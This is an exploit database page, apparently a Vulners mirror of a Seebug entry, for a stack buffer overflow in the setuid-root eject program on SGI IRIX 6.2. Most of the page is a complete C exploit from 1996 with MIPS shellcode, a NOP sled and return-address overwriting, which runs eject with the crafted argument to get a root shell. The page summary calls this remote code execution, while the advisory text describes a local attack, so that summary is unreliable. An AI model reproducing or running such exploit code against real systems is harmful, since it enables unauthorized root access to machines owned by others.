Lucene search
+L

SGI IRIX <= 6.2 eject Vulnerability (2)

🗓️ 01 Jul 2014 00:00:00Reported by RootType 
seebug
 seebug
🔗 www.seebug.org👁 28 Views

Vulnerability in SGI IRIX 6.2 eject program allows remote code execution as roo

Code

                                                source: http://www.securityfocus.com/bid/351/info
 
A vulnerability exists in the eject program shipped with Irix 6.2 from Silicon Graphics. By supplying a long argument to the eject program, it is possible to overwrite the return address on the stack, and execute arbitrary code as root. Eject is normally used to eject removeable media from the system, and as such is setuid root to allow for any user at the console to perform eject operations.

/* copyright by */
/* Last Stage of Delirium, Dec 1996, Poland*/

#include &#60;stdio.h&#62;
#include &#60;stdlib.h&#62;
#include &#60;fcntl.h&#62;

#define BUFSIZE 2068
#define OFFS 800
#define ADDRS 3
#define ALIGN 0
#define ALIGN2 4

char asmcode[]=&#34;\x3c\x18\x2f\x62\x37\x18\x69\x6e\x3c\x19\x2f\x73\x37\x39\x68\x2e\xaf\xb8\xff\xf8\xaf\xb9\xff\xfc\xa3\xa0\xff\xff\x27\xa4\xff\xf8\x27\xa5\xff\xf0\x01\x60\x30\x24\xaf\xa4\xff\xf0\xaf\xa0\xff\xf4\x24\x02\x04\x23\x02\x04\x8d\x0c&#34;;
char nop[]=&#34;\x24\x0f\x12\x34&#34;;

void run(unsigned char *buf) {
  execl(&#34;/usr/sbin/eject&#34;,&#34;lsd&#34;,buf,NULL);
  printf(&#34;execl failed\n&#34;);
}

char jump[]=&#34;\x03\xa0\x10\x25\x03\xe0\x00\x08\x24\x0f\x12\x34\x24\x0f\x12\x34&#34;;

main(int argc, char *argv[]) {
  char *buf, *ptr, addr[8];
  int offs=OFFS, bufsize=BUFSIZE, addrs=ADDRS, align=ALIGN;
  int i, noplen=strlen(nop);

  if (argc &#62;1) bufsize=atoi(argv[1]);
  if (argc &#62;2) offs=atoi(argv[2]);
  if (argc &#62;3) addrs=atoi(argv[3]);
  if (argc &#62;4) align=atoi(argv[4]);

  if (bufsize&#60;strlen(asmcode)) {
    printf(&#34;bufsize too small, code is %d bytes long\n&#34;, strlen(asmcode));
    exit(1);
  }
  if ((buf=malloc(bufsize+(ADDRS&#60;&#60;2)+noplen+1))==NULL) {
    printf(&#34;Can&#39;t malloc\n&#34;);
    exit(1);
  }

  *(int *)addr=(*(unsigned long(*)())jump)()+offs;
  printf(&#34;address=%p\n&#34;,*(int *)addr);

  strcpy(buf,nop);
  ptr=buf+noplen;
  buf+=4-align;
  for(i=0;i&#60;bufsize;i++)
   *ptr++=nop[i%noplen];
  memcpy(ptr-strlen(asmcode),asmcode,strlen(asmcode));
  for(i=0;i&#60;(addrs&#60;&#60;2);i++)
   *ptr++=addr[i%sizeof(int)];
  *ptr=0;

  printf(&#34;buflen=%d\n&#34;, strlen(buf));
  fflush(stdout);

  ptr-=addrs&#60;&#60;2;
  *(int *)addr+=(0x7fff350c-0x7fff31e8)+(4*100)+ALIGN2;
  for(i=0;i&#60;64;i++)
   *ptr++=addr[i&3];


/* gp value is set here */
  ptr=buf+ALIGN+(0x7fff2f00-0x7fff2ce8)-24;
  *(int *)addr=(*(unsigned long(*)())jump)()+OFFS+(0x7fff350c-0x7fff31e8-4)+ALIGN2+32+32412;

  for(i=0;i&#60;64;i++)
   *ptr++=addr[i&3];

  run(buf);
}

                              

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1
28